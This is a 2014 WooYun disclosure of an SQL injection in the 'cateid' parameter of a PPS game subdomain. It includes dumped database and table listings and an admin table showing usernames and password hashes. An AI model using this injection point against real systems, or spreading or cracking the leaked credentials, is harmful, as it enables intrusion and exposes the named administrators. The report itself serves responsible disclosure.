当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-054834

漏洞标题:pps某分站存在sql注射漏洞

相关厂商:PPS网络电视

漏洞作者: 卡卡

提交时间:2014-03-28 16:44

修复时间:2014-05-12 16:45

公开时间:2014-05-12 16:45

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-28: 细节已通知厂商并且等待厂商处理中
2014-03-28: 厂商已经确认,细节仅向厂商公开
2014-04-07: 细节向核心白帽子及相关领域专家公开
2014-04-17: 细节向普通白帽子公开
2014-04-27: 细节向实习白帽子公开
2014-05-12: 细节向公众公开

简要描述:

混个脸熟,别打脸~~

详细说明:

注入点:

http://sgmj.pps.tv/index.php?m=front&c=sgmj&a=news_list&cateid=136


参数cateid存在注射,只是检测,所以并未在进行下去
注入详情:
数据库

available databases [7]:
[*] dba
[*] dd.game.pps.tv
[*] information_schema
[*] mysql
[*] performance_schema
[*] qiy_game_pps_tv
[*] test


当前库:
dd.game.pps.tv
表:

Database: dd.game.pps.tv
[14 tables]
+--------------------------------+
| ppsdd_admins_resources |
| ppsdd_ads |
| ppsdd_cate_action |
| ppsdd_game_category |
| ppsdd_game_info |
| ppsdd_game_news |
| ppsdd_game_pic |
| ppsdd_kaifu_platform |
| ppsdd_kaifu_platform_game_data |
| ppsdd_link |
| ppsdd_resources |
| ppsdd_role |
| ppsdd_role_resources |
| ppsdd_system_admins |
+--------------------------------+


管理帐号

Table: ppsdd_system_admins
[5 entries]
+------------+------------------+----------------+
| admin_name | admin_passwd | admin_realname |
+------------+------------------+----------------+
| admin | 9a18c428cb38d5f2 | vanono |
| huyi | 587a910882016321 | ?? |
| kj | 587a910882016321 | kj |
| tq | 587a910882016321 | ?? |
| tuwenbin | 587a910882016321 | ??? |
+------------+------------------+----------------+


只是检测,并为继续深入!

漏洞证明:

.png

.png


.png

修复方案:

添加过滤语句或增加waf设备。

版权声明:转载请注明来源 卡卡@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-03-28 16:55

厂商回复:

感谢反馈!

最新状态:

暂无


漏洞评价:

评论